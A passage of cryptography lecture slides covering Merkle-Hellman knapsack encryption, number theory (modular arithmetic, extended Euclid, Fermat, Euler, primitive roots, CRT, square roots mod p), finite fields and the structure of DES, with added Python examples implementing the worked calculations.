    a_k > Σ_{j=1}^{k−1} a_j

An example is the sequence

    A = {77, 105, 192, 392, 801, 1662, 3286, 6537}

Give a demo of superincreasing sequences using printSuperIncreasingSeq(superIncreasingSeq(7)).

Merkle-Hellman Knapsack Encryption. . .

Now suppose one were to ask whether there's a subset of numbers in the knapsack that adds up to 2967: there's an easy way to find it! Take the elements from largest to smallest; each belongs to the subset if and only if it fits in what remains. But the problem is that solving a superincreasing knapsack is as easy for the enemy as it is for the recipient! So we try to confound the enemy by transforming a superincreasing knapsack into a random-looking one.

En/decryption with MH Knapsacks

Choose a modulus m > Σ a_i (m need not be prime; in the example below m = 13917 = 3 · 4639) and a multiplier w relatively prime to m. Transform A into B such that b_i = w · a_i mod m. B is the public key; (A, w, m) is the private key.

Let's say that m = 13917 for the example above and that w = 269. Then

    B = {6796, 411, 9897, 8029, 6714, 1734, 7163, 4911}

To encode the character N, which is 01001110, we add the selected b_i: 411 + 6714 + 1734 + 7163 = 16022. To decode this number, the recipient computes 269^{−1} · 16022 mod 13917 = 3725 · 16022 mod 13917 = 5854, and solving the superincreasing knapsack for 5854 gives 105 + 801 + 1662 + 3286, i.e., the bits 01001110!

En/decryption with Knapsacks. . .

Practical implementation: generate random numbers 0 < r_i < 2^200 and choose a_i = 2^{200+i−1} + r_i, which is superincreasing by construction.
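An added example, not from the slides, that implements the three knapsack slides above with the slides' own numbers: brute-force subset sum for the general knapsack A = {4, 7, 33, 1, 12, 78, 11, 291}, greedy solving of the superincreasing sequence, and the Merkle-Hellman disguise and undisguise with m = 13917 and w = 269. Bits are taken MSB first, as the slides do with 0x4E = 01001110.

```python
from math import gcd

A_GENERAL = [4, 7, 33, 1, 12, 78, 11, 291]              # the "hard" knapsack slide
A_PRIVATE = [77, 105, 192, 392, 801, 1662, 3286, 6537]  # the superincreasing one
M, W = 13917, 269                                        # modulus and multiplier


def bits_msb_first(byte, width=8):
    return [(byte >> (width - 1 - i)) & 1 for i in range(width)]


def knapsack_encrypt(weights, byte):
    """Add the weights selected by the 1 bits of the character (MSB first, as on the slides)."""
    return sum(b * w for b, w in zip(bits_msb_first(byte, len(weights)), weights))


def subset_sum(weights, target):
    """General knapsack by brute force over all 2^n subsets; returns one solution or None."""
    n = len(weights)
    for mask in range(1 << n):
        chosen = [w for i, w in enumerate(weights) if (mask >> i) & 1]
        if sum(chosen) == target:
            return chosen
    return None


def is_superincreasing(seq):
    total = 0
    for a in seq:
        if a <= total:
            return False
        total += a
    return True


def solve_superincreasing(seq, target):
    """Greedy, largest first: an element belongs to the subset iff it still fits.
    Returns the bit vector (aligned with seq) or None if no subset exists."""
    bits = [0] * len(seq)
    for i in range(len(seq) - 1, -1, -1):
        if seq[i] <= target:
            bits[i] = 1
            target -= seq[i]
    return bits if target == 0 else None


def mh_public_key(private_seq, m, w):
    """Disguise the superincreasing sequence: b_i = w a_i mod m."""
    if not is_superincreasing(private_seq):
        raise ValueError("private sequence must be superincreasing")
    if m <= sum(private_seq) or gcd(w, m) != 1:
        raise ValueError("need m > sum(a_i) and gcd(w, m) = 1")
    return [w * a % m for a in private_seq]


def mh_decrypt(private_seq, m, w, ciphertext):
    """Undo the disguise with w^-1 mod m, then solve the easy knapsack."""
    s = pow(w, -1, m) * ciphertext % m
    bits = solve_superincreasing(private_seq, s)
    if bits is None:
        raise ValueError("not a valid ciphertext")
    return int("".join(map(str, bits)), 2)
```

The condition m > Σ a_i is what makes decryption work: the undisguised sum never wraps around mod m, so the greedy solver sees the true subset sum.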

Why is the Knapsack considered hard?

The general knapsack problem is NP-complete! Note, however, that NP-completeness of the general problem says nothing about the particular instances produced by the trapdoor: the Merkle-Hellman scheme was broken by Shamir in 1982, because the modular-multiplication disguise of a superincreasing sequence can be undone without the private key.

A primer on complexity theory


f(n) is said to be O(g(n)) if there exist c and n_0 such that

    f(n) ≤ c |g(n)|  for all n ≥ n_0

Example: f(n) = 17n + 10 is O(n) because 17n + 10 ≤ 18n for n ≥ n_0 = 10.

Demo: plot [n=1:100] 17*n+10, 18*n.

Example: f(n) = a_t n^t + a_{t−1} n^{t−1} + ... + a_0 is O(n^t).

A little primer on complexity theory. . .

The class P: problems that can be solved in time bounded by a polynomial function of the problem size. For example, sorting, finding the max of a set of numbers, multiplication, exponentiation. The class NP: problems whose solutions can be verified in polynomial time. For example, Hamiltonian cycle, CNF satisfiability. The class NP-complete: problems in NP to which every other problem in NP can be reduced in polynomial time. If an NP-complete problem yields a polynomial-time solution, then P = NP. In some sense then, these are the hardest problems to solve in the class NP. We know that P ⊆ NP and that P ≠ EXP. But is P = NP?

Lessons
Compress before you encrypt: compression removes the redundancy that cryptanalysis feeds on, and compressing ciphertext gains nothing, since good ciphertext looks random. Beware, though, that the compressed length then depends on the plaintext and leaks through the ciphertext length; this is exactly what the CRIME and BREACH attacks on TLS exploited.

Number Theory
Chapter 3 of textbook


Modular Arithmetic
If a mod n = b, then a = c · n + b for some integer c. When you reduce a number a modulo n you usually want 0 ≤ b < n. Division Principle [Bar02, pg. 61]: let n be a positive integer and let a be any integer. Then there is exactly one pair of integers (c, b), 0 ≤ b < n, such that

    a = c · n + b

Examples: 17 mod 5 = 2. 5 mod 17 = 5. −8 mod 3 = 1.

Modular Arithmetic. . .
Some interesting properties of modular arithmetic:

    (a + b) mod n = (a mod n + b mod n) mod n
    (a · b) mod n = ((a mod n) · (b mod n)) mod n
    a^{−1} mod n = (a mod n)^{−1} mod n     (when the inverse exists)

which implies for example that

    (a · (b + c)) mod n = ((a mod n) · ((b + c) mod n)) mod n
                        = ((a mod n) · ((b mod n + c mod n) mod n)) mod n

Modular Arithmetic. . .
Example:

    (1234^103 · (1234^32 + 1004^245)) mod 7
    = (2^103 · (2^32 + 3^245)) mod 7              since 1234 mod 7 = 2 and 1004 mod 7 = 3
    = (2^102 · 2 · (2^32 + 3^245)) mod 7
    = ((2^3)^34 · 2 · (2^32 + 3^245)) mod 7
    = (8^34 · 2 · (2^32 + 3^245)) mod 7
    = (1^34 · 2 · (2^32 + 3^245)) mod 7           since 8 mod 7 = 1
    = 2 · (4 + 5) mod 7                            since 2^32 mod 7 = 4 and 3^245 mod 7 = 5
    = 2 · 2 mod 7
    = 4

Modular Arithmetic. . .
Or, it is
6764272377039604808006178055144906284633965782655606023664543731697675295138467674632079193559564693975100853574063429268655061579855616806952088963846232974182208488038849558763634180303504832472507246314833258013960116375880716395998061679941933095837785630560123826359207260539700679914567732449971041003694134911024550323643899333412749847654642971626166584986296154744033730885175975569766206580332174388028086818262058659186680791454906474093459490637896812299657407272406107888091704653742699714387717546200022361247224368645062455882516778860769297702055240071720372570557423808644154330408879925808925140855381986628240396957657417866896014997202537989607295158526258761846453044514479205381938683422173039265005451812870791033921812833308341319798689265312644584797363587786225724994494157639438659457878075595424441169423586430034659067491156897331743802635884549667238178909903984749431006079030838865685491827363683331151586843871472933347390828720939664198710347727796483110738685594792944199344858089699587734429853257643035321271289118720 mod 7 =4


Modular Exponentiation
Say you want to compute 6^469 mod 7. You could compute 6 · 6 · ... · 6 (469 times). Or, observe that

    469 = 111010101_2 = 2^8 + 2^7 + 2^6 + 2^4 + 2^2 + 2^0

so that

    6^469 = 6^{2^8} · 6^{2^7} · 6^{2^6} · 6^{2^4} · 6^{2^2} · 6^{2^0}

So instead compute each term individually with one multiply each. That is, compute 6^2, 6^4, 6^8, 6^16, 6^32, 6^64, 6^128, 6^256 by repeated squaring, reducing mod 7 after every multiplication, and multiply together the ones whose bit is set.
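An added example (not from the slides) of square-and-multiply as just described, plus a trace that lists exactly the terms 6^{2^j} that get multiplied together for 6^469, and the two-slide-earlier example reduced operand by operand.

```python
def modexp(base, exp, mod):
    """Right-to-left square-and-multiply: walk the bits of exp from the least significant,
    squaring a running power each step and multiplying it in when the bit is 1.
    Every product is reduced mod mod, so intermediate values never exceed mod^2."""
    if mod == 1:
        return 0
    result, power = 1, base % mod
    while exp > 0:
        if exp & 1:
            result = result * power % mod
        power = power * power % mod
        exp >>= 1
    return result


def square_and_multiply_trace(base, exp, mod):
    """The (bit position j, base^(2^j) mod mod) pairs that are actually multiplied together."""
    terms, j, power = [], 0, base % mod
    while exp > 0:
        if exp & 1:
            terms.append((j, power))
        power = power * power % mod
        exp >>= 1
        j += 1
    return terms


def slide_example():
    """(1234^103 * (1234^32 + 1004^245)) mod 7, reducing every operand first."""
    return modexp(1234, 103, 7) * (modexp(1234, 32, 7) + modexp(1004, 245, 7)) % 7
```

Python's built-in pow(base, exp, mod) does the same thing; the hand-written version is here to make the bit walk visible, and the trace for 6^469 mod 7 shows the set bits at positions 0, 2, 4, 6, 7, 8 of 111010101_2.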

GCD
The GCD of two numbers a and b is the largest integer that divides both a and b.

    GCD(a, b) = GCD(b, a mod b)

If d | a and d | b (LHS) then d | b and d | (a mod b) (RHS), i.e., all divisors of the LHS are also divisors of the RHS. Similarly, if d | b and d | (a mod b) then d | a.

Why doesn't GCD(a, b) = GCD(a, a mod b) work? Because you can't go in the reverse direction, i.e., d | a and d | (a mod b) does not imply that d | b. This is because if d | (a mod b) then d | (a − kb), but it may be that d | k instead of d | b.

GCD. . .
    |<-------------- a -------------->|
    |<------- k·b ------->|<- a % b ->|

ax + by = d
Theorem [TW02, Page 64]. Let a and b be two integers, with at least one of a, b ≠ 0, and let d = gcd(a, b). Then there exist integers x, y such that

    a x + b y = d

In particular, if a and b are relatively prime, then there exist integers x, y such that a x + b y = 1. Proof: by induction on the GCD procedure.

Inverse
The inverse of an element x mod n is the element y such that x y ≡ 1 (mod n). Consider the set of numbers modulo 9. Not every number has an inverse modulo 9. In fact, only numbers coprime to 9 have inverses!

Inverse mod 9
Multiplication table mod 9 (row × column); a row containing a 1 belongs to a number with an inverse:

    ×  | 0 1 2 3 4 5 6 7 8
    ---+------------------
    0  | 0 0 0 0 0 0 0 0 0
    1  | 0 1 2 3 4 5 6 7 8
    2  | 0 2 4 6 8 1 3 5 7
    3  | 0 3 6 0 3 6 0 3 6
    4  | 0 4 8 3 7 2 6 1 5
    5  | 0 5 1 6 2 7 3 8 4
    6  | 0 6 3 0 6 3 0 6 3
    7  | 0 7 5 3 1 8 6 4 2
    8  | 0 8 7 6 5 4 3 2 1

So 1, 2, 4, 5, 7, 8 have inverses (1, 5, 7, 2, 4, 8 respectively) and 3, 6 do not.

EGCD
The Extended Euclidean Algorithm EGCD(f, d) permits one to find d^{−1} (mod f) and f^{−1} (mod d) [provided that GCD(f, d) = 1] in addition to GCD(f, d). Start with the vectors (1, 0, f) and (0, 1, d) and reduce one vector by the other, subtracting a multiple of one from the second, until the result has third component 1.

EGCD. . .
Both vectors maintain the invariant

    f · x_1 + d · x_2 = x_3

Eventually, you get an equation of the form f · x_1 + d · x_2 = 1. This gives x_2 = d^{−1} (mod f) and x_1 = f^{−1} (mod d).

Show examples of GCD and EGCD using RSA.pm and /bin/perl/egcd.

Modular Division
Proposition [TW02, Page 68]. Let a, b, c, n be integers with n ≠ 0 and with GCD(a, n) = 1. If

    a b ≡ a c (mod n)

then b ≡ c (mod n).

The condition on a matters. Example: 2 · 1 ≡ 2 · 4 (mod 6), but 1 ≢ 4 (mod 6). Solving a x ≡ c (mod n) with GCD(a, n) = 1 is now easy: multiply both sides by a^{−1}.

Modular Division. . .
In the equation a x ≡ b (mod n), what if GCD(a, n) = d > 1?

If d ∤ b, there is no solution.

Otherwise solve (a/d) x ≡ (b/d) (mod n/d), which has a unique solution mod n/d because gcd(a/d, n/d) = 1. Let the solution be x_0. Then a x_0 ≡ b (mod n).

The solutions of a x ≡ b (mod n) are the values mod n that satisfy the reduced equation. The equation has d roots mod n; each is distinct mod n, but they are all congruent mod n/d:

    x_0, x_0 + (n/d), x_0 + 2(n/d), ..., x_0 + (d − 1)(n/d)

Modular Division. . .
    0          n/d         2n/d         ...          n
    |----x_0----|----x_0----|----x_0----|------------|

There's a solution 0 ≤ x_0 < n/d of (a/d) x ≡ (b/d) (mod n/d). But if x_0 is a solution, then so is x_0 + k · (n/d). And x_0 and x_0 + k · (n/d) are distinct mod n for 0 < k < d.
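An added example (not from the slides) implementing the EGCD slides and the two modular-division slides above: the vector form of the extended Euclidean algorithm with the invariant f·x_1 + d·x_2 = x_3, inverses from it, the inverse table for mod 9, and the solver for a x ≡ b (mod n) that returns all d solutions when gcd(a, n) = d divides b.

```python
def egcd(f, d):
    """Extended Euclid on the vectors (1, 0, f) and (0, 1, d); each keeps the invariant
    f*x1 + d*x2 = x3. Returns (gcd, x1, x2) with f*x1 + d*x2 = gcd."""
    u, v = (1, 0, f), (0, 1, d)
    while v[2] != 0:
        q = u[2] // v[2]
        u, v = v, tuple(ui - q * vi for ui, vi in zip(u, v))
    return u[2], u[0], u[1]


def inverse(a, n):
    """a^-1 mod n, which exists iff gcd(a, n) = 1."""
    g, x, _ = egcd(a, n)
    if g != 1:
        raise ValueError("%d has no inverse mod %d (gcd = %d)" % (a, n, g))
    return x % n


def inverse_table(n):
    """{x: x^-1 mod n} for the residues that have one (the rows holding a 1 in the slide's table)."""
    return {x: inverse(x, n) for x in range(1, n) if egcd(x, n)[0] == 1}


def solve_linear(a, b, n):
    """All x in [0, n) with a x ≡ b (mod n). With d = gcd(a, n): no solution unless d | b,
    otherwise the d solutions x0 + k n/d, where x0 solves (a/d) x ≡ (b/d) (mod n/d)."""
    d = egcd(a, n)[0]
    if b % d:
        return []
    a1, b1, n1 = a // d, b // d, n // d
    x0 = b1 * inverse(a1, n1) % n1
    return [x0 + k * n1 for k in range(d)]
```

egcd(269, 13917) returns the 3725 used on the Merkle-Hellman slide as 269^{−1}, and solve_linear(2, 2, 6) returns both 1 and 4, the two roots behind the cancellation counter-example.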

Primes
An integer a > 1 whose only divisors are the trivial divisors 1 and a is said to be a prime number [CLRS01]. Examples: 2, 3, 5, 7, 11, 13, 17, 19, 23, 29, ... If n is a composite integer, then n has a prime factor not exceeding √n. What this means is that in order to test a number n for primality, it's sufficient to try dividing it by all primes ≤ √n. There are infinitely many primes [Ros93, Theorem 1.17]: n! + 1 cannot have a prime divisor ≤ n, so there is always a prime larger than n.

Primes. . .
π(n), the number of primes ≤ n, satisfies π(n) ~ n / log n as n → ∞. Even though the number of primes is infinite, their density gets sparser and sparser as n → ∞. Approximately speaking, one would need to sample about log n numbers to find a prime close to n.

Use Gnuplot to plot [n=1:1000000] n/log(n), n to show how n/log(n) varies with n.

Primes. . .
Consider finding all primes ≤ 25 using the sieve of Eratosthenes. Lay the numbers out in a grid, then strike out the multiples of 2, 3 and 5 (the primes ≤ √25):

     1   2   3   4   5
     6   7   8   9  10
    11  12  13  14  15
    16  17  18  19  20
    21  22  23  24  25

What remains: 2, 3, 5, 7, 11, 13, 17, 19, 23.

Factorization
Find a factor of n by successively dividing n by the primes 2 ... √n. To find the factors of n, find x ≢ ±y (mod n) with x^2 ≡ y^2 (mod n) [TW02, Sec. 6.3]. Then gcd(x − y, n) gives a non-trivial factor of n. Pollard's p − 1 method: find a number x that is a multiple of p − 1, where p is a non-trivial factor of n. Then for a relatively prime to n (and hence to p), a^x ≡ 1 (mod p) by Fermat's theorem, so gcd(a^x − 1, n) is a possible non-trivial factor of n. See [TW02, Sec. 6.4] for details.

Fermat's Theorem
For prime p and integer b not divisible by p,

    b^{p−1} ≡ 1 (mod p)

Consider P = 1b · 2b · 3b · ... · (p − 2)b · (p − 1)b = b^{p−1} (p − 1)!. The values 1b, 2b, ..., (p − 1)b are all distinct and nonzero mod p, because the residue system mod p is a field and b has an inverse in it. Thus 1b, 2b, ... merely enumerate the numbers 1 ... (p − 1) in some order, and P ≡ (p − 1)! (mod p). Cancelling (p − 1)! from both sides of the equation [allowed because (p − 1)! is coprime to p] we get b^{p−1} ≡ 1.

Using Fermats Theorem


Consider the prime 17. Then 2^16 = 65536 ≡ 1 mod 17. 4^16 = 4294967296 ≡ 1 mod 17. 15^16 = 6568408355712890625 ≡ 1 mod 17. Let's try the same exercise with the prime 19. 2^18 = 262144 ≡ 1 mod 19. 4^18 = 68719476736 ≡ 1 mod 19. 15^18 = 1477891880035400390625 ≡ 1 mod 19.
If x^(p−1) ≡ 1 mod p, then x · x^(p−2) ≡ 1 mod p. This means that x^(p−2) is the inverse of x mod p.

Number Theoretic Theorems p.92

Euler's theorem
It is a generalization of Fermat's theorem. Definition: φ(n) is the # of positive integers < n that are relatively prime to n. For e.g., φ(9) = |{1, 2, 4, 5, 7, 8}| = 6. If p is prime then φ(p) = (p − 1). Theorem: If GCD(x, n) = 1, then x^φ(n) ≡ 1 (mod n).

Number Theoretic Theorems p.93

Euler's function
φ(p^r) = p^r − p^(r−1). Numbers not relatively prime to p^r are p, 2p, ..., p^r − p. That is p^(r−1) − 1 numbers. Therefore, # of integers relatively prime to p^r is p^r − 1 − (p^(r−1) − 1) = p^(r−1)(p − 1).
If gcd(m, n) = 1 then φ(mn) = φ(m) φ(n). Follows from CRT. The pairs (x ∈ units mod m, y ∈ units mod n) are relatively prime to both m and n: consider CRT⁻¹ of (x, y) to be a mod (mn). Conversely, if gcd(a, mn) = 1, let gcd(a, m) = d. Then d | a and d | m, so d | (a mod m); since d also divides mn, d = 1 and a mod m is a unit.

Number Theoretic Theorems p.94

Primitive Roots
g is a primitive root of n if ord(g) = φ(n). Not all integers have primitive roots. Integers with primitive roots are of the form: 2, 4, p^k, 2p^k, p an odd prime. When p is a prime, a primitive root mod p is a number whose powers yield every nonzero number mod p.

Number Theoretic Theorems p.95

Primitive Roots. . .
[Table: the powers g^i (mod 19) for g = 1 ... 18 and i = 1 ... 18. A row that runs through all of 1 ... 18 before returning to 1 belongs to a primitive root of 19; the row for g = 18 just alternates 18, 1, 18, 1, ...]

Number Theoretic Theorems p.96

Primitive Roots. . .
Let g be a primitive root for prime p [TW02, Sec. 3.7]. If n is an integer, then g^n ≡ 1 (mod p) iff n ≡ 0 (mod p − 1). If j and k are integers, then g^j ≡ g^k (mod p) iff j ≡ k (mod p − 1).
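Euler's φ, Euler's theorem, and the primitive-root facts of the last few slides (including the power table mod 19 that the slides print) as an added Python example; the code is not from the slides or the textbook and uses brute force, so it is meant for small moduli only:

```python
# Added example: phi(n), Euler's theorem, multiplicative order, primitive roots,
# and the table of powers g^i mod p (p = 19 reproduces the slides' table).
from math import gcd


def phi(n):
    """Euler's phi by counting: # of 1 <= x < n with gcd(x, n) == 1."""
    return sum(1 for x in range(1, n) if gcd(x, n) == 1)


def euler_holds(n):
    """Euler's theorem: x^phi(n) == 1 (mod n) for every unit x mod n."""
    e = phi(n)
    return all(pow(x, e, n) == 1 for x in range(1, n) if gcd(x, n) == 1)


def order(g, p):
    """Multiplicative order of g mod prime p: the least k > 0 with g^k == 1."""
    k, x = 1, g % p
    while x != 1:
        x = x * g % p
        k += 1
    return k


def primitive_roots(p):
    """Elements of Z_p^* whose order is phi(p) = p - 1."""
    return [g for g in range(1, p) if order(g, p) == p - 1]


def power_table(p):
    """Row g -> [g^1, g^2, ..., g^(p-1)] mod p; a primitive root's row covers 1..p-1."""
    return {g: [pow(g, i, p) for i in range(1, p)] for g in range(1, p)}


def print_table(p):
    width = len(str(p - 1))
    for g, row in power_table(p).items():
        print(f"{g:>{width}} |", " ".join(f"{v:>{width}}" for v in row))


if __name__ == "__main__":
    print_table(19)
    print("primitive roots of 19:", primitive_roots(19))
```

Running it shows six rows (g = 2, 3, 10, 13, 14, 15) that visit every value 1 ... 18, which is φ(18) = 6 primitive roots, and confirms that 2^n ≡ 1 (mod 19) exactly when 18 | n.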

Number Theoretic Theorems p.97

CRT
See [Knu98, Section 4.3.2]. Alternative for doing arithmetic on large numbers. Have several moduli m1, m2, ..., mr relatively prime in pairs and work on residues u mod mi instead of with u. Regard (u1, u2, ..., ur) as a new type of internal representation for u. Disadvantage: can't test for >, overflow, do division.

Number Theoretic Theorems p.98

CRT. . .
Advantage: Parallelizes multiplication.
(u1, u2, ..., ur) + (v1, v2, ..., vr) = ((u1 + v1) mod m1, ..., (ur + vr) mod mr)    (1)
(u1, u2, ..., ur) − (v1, v2, ..., vr) = ((u1 − v1) mod m1, ..., (ur − vr) mod mr)    (2)
(u1, u2, ..., ur) × (v1, v2, ..., vr) = ((u1 v1) mod m1, ..., (ur vr) mod mr)        (3)
You can see the above because uv mod mi = ((u mod mi)(v mod mi)) mod mi.

This means that the representation of u × v in the mi component should be (u mod mi) × (v mod mi).
Number Theoretic Theorems p.99

CRT. . .
Proof: Let m = m1 m2 ··· mr and let u1, u2, ..., ur be integers. Then there is exactly one integer u such that 0 ≤ u < m and u ≡ uj (mod mj), 1 ≤ j ≤ r.
Let Mk = m/mk. Then GCD(Mk, mk) = 1, so Mk⁻¹ mod mk exists. Let this be yk; yk is small, with 0 < yk < mk. Then

u = u1 M1 y1 + u2 M2 y2 + ··· + ur Mr yr (mod m) is the solution of the simultaneous congruences.

Number Theoretic Theorems p.100

CRT Example
Let m1 = 9, m2 = 10, m3 = 11. Then m = 990. Suppose you wanted to find 889^899 mod 990. Find the representation of 889 in the new system, which is (7, 9, 9). Now 889^899 = (7, 9, 9)^899 = (7^899 mod 9, 9^899 mod 10, 9^899 mod 11). That is = (4, 9, 5). Convert this back to the integer = 49.
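The residue representation, Knuth's reconstruction formula u = Σ uk Mk yk, and the 889^899 mod 990 computation of this slide, as an added Python example (not code from the slides or the textbook; the moduli must be pairwise coprime, as the CRT slide requires):

```python
# Added example: CRT arithmetic on residues and the u = sum(u_k M_k y_k) reconstruction.
from math import prod


def to_residues(u, moduli):
    """The new internal representation of u: (u mod m_1, ..., u mod m_r)."""
    return tuple(u % m for m in moduli)


def crt(residues, moduli):
    """Knuth's formula: u = sum u_k * M_k * y_k (mod m), with M_k = m / m_k and
    y_k = M_k^-1 mod m_k, which exists because the moduli are pairwise coprime."""
    m = prod(moduli)
    u = 0
    for u_k, m_k in zip(residues, moduli):
        M_k = m // m_k
        y_k = pow(M_k, -1, m_k)
        u += u_k * M_k * y_k
    return u % m


def residue_mul(a, b, moduli):
    """Equation (3): componentwise product, with no carries between components."""
    return tuple((x * y) % m for x, y, m in zip(a, b, moduli))


def residue_pow(u, e, moduli):
    """u^e mod prod(moduli): exponentiate each small residue independently, then recombine."""
    r = tuple(pow(x, e, m) for x, m in zip(to_residues(u, moduli), moduli))
    return crt(r, moduli)


if __name__ == "__main__":
    moduli = (9, 10, 11)
    print(to_residues(889, moduli))          # (7, 9, 9)
    print(residue_pow(889, 899, moduli))     # 49
```

The components are independent, which is the "parallelizes multiplication" advantage; the cost is the one reconstruction at the end.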

Number Theoretic Theorems p.101

Square roots mod p

Theorem (Euler's criterion): a is a quadratic residue in Zp* iff a^((p−1)/2) ≡ 1 (mod p).

If a is a QR, then let a = b^2. Then a^((p−1)/2) = b^(p−1) ≡ 1 (mod p).

If a^((p−1)/2) ≡ 1, let a = g^i for a generator g. So g^(i(p−1)/2) ≡ 1. But g being a generator its ord is p − 1 ⇒ (p − 1) | i(p − 1)/2 ⇒ i is even ⇒ a is a QR.

Number Theoretic Theorems p.102

Square roots mod p. . .


Let p ≡ 3 (mod 4) be prime and let y be an integer. Let x ≡ y^((p+1)/4) (mod p). Then, if y has a square root mod p, the roots are ±x. Otherwise, −y has a square root mod p, and its roots are ±x. This is because x^4 ≡ y^(p+1) ≡ y^2 y^(p−1) ≡ y^2 (mod p), which means that x^2 ≡ +y or x^2 ≡ −y. So, at least one of ±y is a QR. But by Euler's criterion, only one of them can be, because (p − 1)/2 = (4k + 3 − 1)/2 = 2k + 1 is odd [so (−1)^((p−1)/2) = −1 and −1 is not a QR].

Number Theoretic Theorems p.103

Square roots mod p. . .


Example: Find √26055 mod the prime 34807. 34807 ≡ 3 (mod 4).

26055^((34807+1)/4) (mod 34807) = 33573. Example: Find all √1522756 mod 2325781. 2325781 = 523 × 4447. Both 523 and 4447 are ≡ 3 (mod 4). Use CRT to find the four solutions.

Number Theoretic Theorems p.104

Finite Fields
A field F (sometimes denoted by Fq) is a set of elements with two operations + and · satisfying:

F is closed under + and ·, commutative w.r.t. + and ·, associative w.r.t. + and ·, and · distributes over +. 0 is the identity for +, 1 is the identity for ·. ∀a ∈ F, ∃ −a | a + (−a) = 0. ∀a ≠ 0 ∈ F, ∃ a multiplicative inverse a⁻¹ ∈ F such that a · a⁻¹ = 1.

For every power p^n of a prime, there is exactly one finite field with p^n elements, and these are the only finite fields.

Number Theoretic Theorems p.105

The Ring of Polynomials Z2[X]

This is the set of polynomials whose coefficients ∈ Z2 i.e., {0, 1}. x^6 + x^3 + 1 ↔ 01001001. +, −, × same as with polynomials except that coefficients are added and multiplied in Z2. Division possible with a remainder. For e.g., (x^4 + x^3 + 1) ÷ (x^2 + x + 1) = (q: x^2 + 1, r: x).

Number Theoretic Theorems p.106

Irreducible polynomial
Let F be a field. A nonconstant polynomial f(x) ∈ F[x] is said to be irreducible if f(x) cannot be expressed as a product of two polynomials of lower degree [Gal02, Pg. 295]. f(x) = 2x^2 + 4 is irreducible over R but reducible over C. f(x) = x^2 + 1 is irreducible over Z3 but reducible over Z5: it factors into (x + 2)(x + 3).

Number Theoretic Theorems p.107

Zp[X ] mod (irreducible polynomial)


Procedure for constructing a finite field with p^n elements. Zp[X] is the set of polynomials with coefficients mod p. Choose P(x) to be an irreducible polynomial mod p of degree n. Let GF(p^n) be Zp[X] mod P(x). Then GF(p^n) is a field with p^n elements. Different irreducible polynomials generate isomorphic fields.

Number Theoretic Theorems p.108

GF(2^8) and AES

Convenient to represent a field element as a byte. Irreducible polynomial is x^8 + x^4 + x^3 + x + 1.

Number Theoretic Theorems p.109

Examples
Show that x^4 + x + 1 is irreducible in Z2[x].
At least one factor is of degree ≤ 2. Possible choices are x^2 + x + 1, x^2 + 1, x + 1. None of them divide x^4 + x + 1.

Show that x^16 ≡ x (mod x^4 + x + 1).

Number Theoretic Theorems p.110

Ints mod p vs Poly mod irreducible

    Integers                    Polynomials
    Prime number q              Irreducible P(X) of degree n in Zp[X]
    Zq                          Zp[X] (mod P(X))
    Field with q elements       Field with p^n elements

Number Theoretic Theorems p.111

Block & Stream Ciphers


Chapter 4 of textbook

Number Theoretic Theorems p.112

Block Ciphers
A block cipher of block size b bits specifies a permutation on b-bit values for each key. DES is a 64-bit block cipher while AES is a 128-bit block cipher.
[Figure: a b-bit plaintext block and a k-bit key enter the block cipher; a b-bit ciphertext block comes out.]

Block Ciphers & DES p.113

Block Ciphers. . .
A b-bit block cipher has 2^b plaintext and ciphertext blocks. This means there are (2^b)! permutations. Thus, a 64-bit block cipher with 80-bit key is not an anomaly.

Block Ciphers & DES p.114

DES: History
Described in FIPS 46-3. Late 60s: Feistel worked on block ciphers. 1972: NBS (NIST) issued RFP. 1974: IBM developed and submitted LUCIFER (64 bit block, 128 bit key). NSA fixed it (S-boxes). 1979: Adopted as a standard, accepted by the banking community. 1999: Broken in 22 hours using exhaustive key search.

Block Ciphers & DES p.115

DES: Properties
Block size = 64 bits; key size = 56 bits. Software nightmare because of permutations and table lookups. Great for pipelining because each round can work on a different key. Key size too short: brute force search possible. Exhibits strong avalanche effect [Sta99, pg. 73]. Complementation property: DES_k̄(X̄) = ¬DES_k(X), where the bar and ¬ denote the bitwise complement.

Block Ciphers & DES p.116

Block Ciphers DES


[Figure: the DES Feistel network unrolled for three rounds, L0 R0 → L1 R1 → L2 R2 → L3 R3, each round applying F with round key K0, K1, K2 to the right half and XORing into the left half. Decryption feeds the swapped halves from the bottom of the first diagram back through the same structure with the round keys in reverse order.]

Block Ciphers & DES p.117

Block Ciphers DES. . .


Feistel Structure. Decryption essentially same as encryption. Inverts itself with a reversed key schedule.

Block Ciphers & DES p.118

Block Ciphers DES. . .


The initial permutation IP.

    58  50  42  34  26  18  10   2
    60  52  44  36  28  20  12   4
    62  54  46  38  30  22  14   6
    64  56  48  40  32  24  16   8
    57  49  41  33  25  17   9   1
    59  51  43  35  27  19  11   3
    61  53  45  37  29  21  13   5
    63  55  47  39  31  23  15   7

Input bit 58 goes to output bit 1. Bits are numbered from the top-left (1) to the bottom-right (64). The table shows, for each output bit in order, which input bit is connected to it after IP.

Block Ciphers & DES p.119

Block Ciphers DES. . .


IP⁻¹ is the inverse of IP. If bit x goes to bit y in IP, then bit y goes to bit x in IP⁻¹.

Block Ciphers & DES p.120

Block Ciphers DES. . .


The E bit selection table. Converts 32 → 48 bits.

    32   1   2   3   4   5
     4   5   6   7   8   9
     8   9  10  11  12  13
    12  13  14  15  16  17
    16  17  18  19  20  21
    20  21  22  23  24  25
    24  25  26  27  28  29
    28  29  30  31  32   1

Divide the input into groups of four (eight sets). Convert each group into six by borrowing from adjacent members. Bit 32 in the input becomes bit 1 in the output etc. Bits are numbered from the left (1) to the right (64).

Block Ciphers & DES p.121

Block Ciphers DES. . .


The S boxes (S1 shown).

    row    0   1   2   3   4   5   6   7   8   9  10  11  12  13  14  15
     0    14   4  13   1   2  15  11   8   3  10   6  12   5   9   0   7
     1     0  15   7   4  14   2  13   1  10   6  12  11   9   5   3   8
     2     4   1  14   8  13   6   2  11  15  12   9   7   3  10   5   0
     3    15  12   8   2   4   9   1   7   5  11   3  14  10   0   6  13

Take the first and last bit of the input as a two bit binary number to index the row. Take the middle four bits as a binary number to index the column. Bits are numbered from the left (1) to the right (64).

Block Ciphers & DES p.122

Block Ciphers DES. . .


The key schedule. PC1 maps 64 bits → 56 bits. Bits 8, 16, 24, 32, 40, 48, 56, 64 are parity bits and are skipped. Bits are numbered from the left (1) to the right (64). PC2 maps 56 bits → 48 bits. It's the same at each step. Fixed left shifts at each step.

Block Ciphers & DES p.123

Block Cipher Modes


Used to encrypt something other than exactly a block size. Doesn't provide tamper resistance by itself.

Block Ciphers & DES p.124

Block Cipher Modes ECB


